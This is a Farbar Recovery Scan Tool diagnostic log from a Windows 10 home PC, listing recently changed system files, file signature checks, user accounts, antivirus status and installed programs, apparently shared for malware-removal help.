2016-03-01 12:57 - 2016-02-23 02:06 - 01848832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-03-01 12:57 - 2016-02-23 02:06 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-03-01 12:57 - 2016-02-23 02:05 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:04 - 01131520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-03-01 12:57 - 2016-02-23 02:02 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-03-01 12:57 - 2016-02-23 01:58 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerServer.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:57 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 01:54 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-03-01 12:57 - 2016-02-23 01:52 - 00456704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-03-01 12:57 - 2016-02-23 01:50 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 01:49 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 01:48 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2016-03-01 12:57 - 2016-02-23 01:47 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-03-01 12:57 - 2016-02-23 01:47 - 00157184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 01:41 - 03594240 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-03-01 12:57 - 2016-02-23 01:38 - 00480256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 00613376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 00394752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00713728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00379392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 01:35 - 00400896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2016-03-01 12:57 - 2016-02-23 01:31 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 01:31 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 01832448 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 01:29 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-03-01 12:57 - 2016-02-23 01:29 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00555520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncController.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00256512 _____ (Microsoft Corporation) C:\WINDOWS\system32\accountaccessor.dll
2016-03-01 12:57 - 2016-02-23 01:26 - 02158592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-03-01 12:57 - 2016-02-23 01:26 - 01498112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-03-01 12:57 - 2016-02-23 01:25 - 01996288 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 04827136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 01105920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 01:22 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:20 - 00083456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:17 - 02635264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 01:14 - 00990720 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 01:11 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-03-01 12:57 - 2016-02-23 01:05 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:01 - 02295808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-03-01 12:57 - 2016-02-23 00:59 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-03-01 12:57 - 2016-02-23 00:58 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncController.dll
2016-03-01 12:57 - 2016-02-23 00:56 - 04412928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 04894208 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 02229760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 01707520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2016-03-01 12:57 - 2016-02-23 00:53 - 01799168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 00:51 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 00:42 - 03425792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:41 - 02912256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:36 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:35 - 07533568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-03-01 12:57 - 2016-02-23 00:33 - 02604032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:32 - 02793472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:30 - 02061312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-03-01 12:57 - 2016-02-23 00:28 - 06740992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-03-01 12:57 - 2016-02-23 00:26 - 12587520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-03-01 12:57 - 2016-02-08 22:28 - 00277856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-03-01 12:57 - 2016-02-08 22:13 - 00185184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-03-01 12:57 - 2016-02-08 21:18 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\system32\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:18 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2016-02-23 13:55 - 2016-02-23 13:55 - 00007238 _____ C:\Users\levilaing\Downloads\ACRB.txt
2016-02-16 17:08 - 2016-02-16 17:08 - 01046528 _____ C:\Users\levilaing\Downloads\MicrosoftFixit50848.msi
2016-02-12 13:50 - 2016-03-09 17:24 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-09 13:01 - 2016-01-29 00:57 - 04502352 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-02-09 13:01 - 2016-01-29 00:33 - 04064320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-02-09 13:01 - 2016-01-27 00:15 - 01557776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-09 13:01 - 2016-01-27 00:01 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-09 13:01 - 2016-01-26 23:59 - 00304752 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-02-09 13:01 - 2016-01-26 23:57 - 01824264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-09 13:01 - 2016-01-26 23:57 - 00820704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:55 - 00081112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:54 - 00295264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-02-09 13:01 - 2016-01-26 23:46 - 02606824 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-09 13:01 - 2016-01-26 23:46 - 01270072 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:44 - 00604928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-02-09 13:01 - 2016-01-26 23:44 - 00085320 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:43 - 00359776 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-02-09 13:01 - 2016-01-26 23:21 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-09 13:01 - 2016-01-26 23:15 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:11 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:10 - 00099840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:07 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iassam.dll
2016-02-09 13:01 - 2016-01-26 23:04 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:02 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:01 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:59 - 00258048 _____ (Microsoft Corporation) C:\WINDOWS\system32\iassam.dll
2016-02-09 13:01 - 2016-01-26 22:57 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-02-09 13:01 - 2016-01-26 22:52 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:50 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-09 13:01 - 2016-01-26 22:49 - 05662208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-02-09 13:01 - 2016-01-26 22:44 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll
2016-02-09 13:01 - 2016-01-26 22:42 - 01387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-02-09 13:01 - 2016-01-26 22:38 - 07835648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-02-09 13:01 - 2016-01-26 22:32 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-02-09 13:01 - 2016-01-26 22:31 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 17:47 - 2014-07-07 11:35 - 00002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-09 17:44 - 2016-01-06 10:04 - 00000000 ____D C:\WINDOWS\System32\Tasks\Norton Security
2016-03-09 17:44 - 2013-09-13 15:32 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-09 17:38 - 2014-07-07 11:34 - 00000918 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-09 17:37 - 2015-09-01 10:45 - 00000000 __SHD C:\Users\levilaing\IntelGraphicsProfiles
2016-03-09 17:37 - 2013-12-13 19:44 - 00000000 ____D C:\Users\levilaing\AppData\LocalLow\AuthenTec
2016-03-09 17:35 - 2015-12-19 19:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-09 17:34 - 2015-10-30 00:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-03-09 17:34 - 2014-07-08 15:30 - 00000000 ____D C:\Users\levilaing\AppData\Local\Adobe
2016-03-09 17:31 - 2014-07-07 11:34 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-09 17:24 - 2015-03-31 19:40 - 00000000 ____D C:\Program Files (x86)\Fitbit Connect
2016-03-09 16:46 - 2015-12-19 19:25 - 00000000 ____D C:\Users\levilaing
2016-03-09 16:46 - 2014-07-07 11:34 - 00000000 ____D C:\Program Files\Google
2016-03-09 16:46 - 2014-07-07 11:34 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-09 16:45 - 2015-09-03 10:03 - 00000000 ____D C:\Users\levilaing\AppData\LocalLow\Temp
2016-03-09 16:36 - 2015-10-30 00:28 - 00008192 ___SH C:\WINDOWS\system32\config\ELAM
2016-03-09 16:26 - 2015-09-01 10:51 - 00002416 _____ C:\Users\levilaing\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-03-09 16:26 - 2013-12-13 17:53 - 00000000 __RDO C:\Users\levilaing\SkyDrive
2016-03-09 10:13 - 2015-10-30 01:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-09 10:07 - 2015-10-30 01:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-09 10:07 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-08 16:57 - 2013-09-13 13:01 - 00000000 ____D C:\Users\levilaing\AppData\Local\Packages
2016-03-08 16:54 - 2014-07-07 11:34 - 00000000 ____D C:\Users\levilaing\AppData\Local\Google
2016-03-08 16:54 - 2014-01-16 14:20 - 00000000 ____D C:\ProgramData\Google
2016-03-08 16:53 - 2012-12-20 18:47 - 00000000 ____D C:\Program Files (x86)\CyberLink
2016-03-08 16:53 - 2012-12-20 18:32 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-08 16:52 - 2012-12-20 18:46 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2016-03-08 16:51 - 2015-09-28 19:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2016-03-08 16:50 - 2015-09-28 19:17 - 00000000 ____D C:\Program Files\Canon
2016-03-08 16:50 - 2014-01-21 17:04 - 00000000 ____D C:\Program Files (x86)\Canon
2016-03-07 17:19 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\rescache
2016-03-01 13:45 - 2015-12-19 19:24 - 00972104 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-01 13:45 - 2015-10-30 01:21 - 00000000 ____D C:\WINDOWS\INF
2016-03-01 13:40 - 2012-12-20 19:23 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-01 13:37 - 2015-12-19 19:15 - 04967824 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-01 13:33 - 2015-10-30 03:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 __RSD C:\WINDOWS\Media
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-03-01 13:27 - 2015-12-24 12:27 - 00000000 ____D C:\ProgramData\Norton
2016-03-01 08:26 - 2015-12-07 08:59 - 00002005 _____ C:\Users\levilaing\Desktop\Dashlane.lnk
2016-03-01 08:26 - 2015-12-07 08:58 - 00000000 ____D C:\Users\levilaing\AppData\Roaming\Dashlane
2016-02-29 13:22 - 2013-09-13 13:11 - 00000000 ____D C:\Users\levilaing\AppData\Local\ElevatedDiagnostics
2016-02-23 16:21 - 2015-12-15 14:22 - 00000000 ____D C:\Users\levilaing\Desktop\Tor Browser
2016-02-17 19:42 - 2014-10-21 09:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\ProgramData\Oracle
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-17 19:41 - 2016-01-05 13:15 - 00000000 ____D C:\Users\levilaing\.oracle_jre_usage
2016-02-17 19:41 - 2014-10-21 09:58 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-17 19:18 - 2016-01-05 13:35 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-16 13:23 - 2016-01-05 13:36 - 00000000 ____D C:\Users\levilaing\AppData\Local\CrashDumps
2016-02-12 18:00 - 2013-12-24 11:04 - 00000000 ____D C:\Program Files (x86)\HP SimplePass
2016-02-09 14:04 - 2013-08-22 07:25 - 00000167 _____ C:\WINDOWS\win.ini
2016-02-09 14:03 - 2013-09-16 08:59 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-09 13:57 - 2013-09-16 08:59 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-09 09:02 - 2013-09-16 14:19 - 00000000 ____D C:\Users\levilaing\Documents\Youcam

==================== Files in the root of some directories =======

2015-12-18 17:54 - 2015-12-18 17:54 - 0001035 _____ () C:\Program Files (x86)\suit.log
2014-04-18 15:32 - 2014-04-18 15:32 - 0007168 _____ () C:\Users\levilaing\AppData\Roaming\SQLiteManager3.pref
2014-02-04 20:57 - 2014-02-04 20:57 - 0000045 _____ () C:\Users\levilaing\AppData\Roaming\WB.CFG
2014-05-23 10:53 - 2014-05-23 10:53 - 0002165 _____ () C:\Users\levilaing\AppData\Local\recently-used.xbel

Some files in TEMP:
====================
C:\Users\levilaing\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-03-02 03:16

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by levilaing (2016-03-09 17:53:19)
Running from C:\Users\levilaing\Desktop
Windows 10 Home Version 1511 (X64) (2015-12-20 01:54:43)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1018505005-2824899964-3694806622-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1018505005-2824899964-3694806622-503 - Limited - Disabled)
Guest (S-1-5-21-1018505005-2824899964-3694806622-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1018505005-2824899964-3694806622-1005 - Limited - Enabled)
levilaing (S-1-5-21-1018505005-2824899964-3694806622-1001 - Administrator - Enabled) => C:\Users\levilaing

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton Security (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.5.146 - Adobe Systems, Inc.)
AuthenTec TrueAPI 64-bit (Version: 1.6.0.87 - AuthenTec, Inc.) Hidden
BioExcess (Version: 6.5.5.20 - Egis Technology Inc.) Hidden
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version:  - Canon Inc.)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 4.0.0 - Canon Inc.)
Canon MG2500 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG2500_series) (Version: 1.00 - Canon Inc.)
Canon MG2500 series On-screen Manual (HKLM-x32\...\Canon MG2500 series On-screen Manual) (Version: 7.6.1 - Canon Inc.)
Canon MG2500 series User Registration (HKLM-x32\...\Canon MG2500 series User Registration) (Version:  - ‭Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.2.1 - Canon Inc.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.3.2527 - CyberLink Corp.)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.3.2606 - CyberLink Corp.)
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4319 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dashlane (HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Dashlane) (Version: 4.1.0.99957 - Dashlane SAS)
DVD Flick 1.3.0.7 (HKLM-x32\...\DVD Flick_is1) (Version: 1.3.0.7 - Dennis Meuwissen)
Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)
Fitbit Connect (HKLM-x32\...\{E54705FB-98A6-4C03-B2DC-D8C3B5486DCD}) (Version: 2.0.0.6512 - Fitbit Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HP 3D DriveGuard (HKLM\...\{54CE68A8-4F2D-4328-B1F7-D6C720405F7F}) (Version: 4.2.9.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{59F8C5AA-91BD-423D-BF05-09A80F39898F}) (Version: 2.10.62 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{E5823036-6F09-4D0A-B05C-E2BAA129288A}) (Version: 3.0.6 - Hewlett-Packard Company)
HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\{4BACA3B8-F63A-44ED-9A8D-48B4D02AD268}) (Version: 6.0.100.276 - Hewlett-Packard)
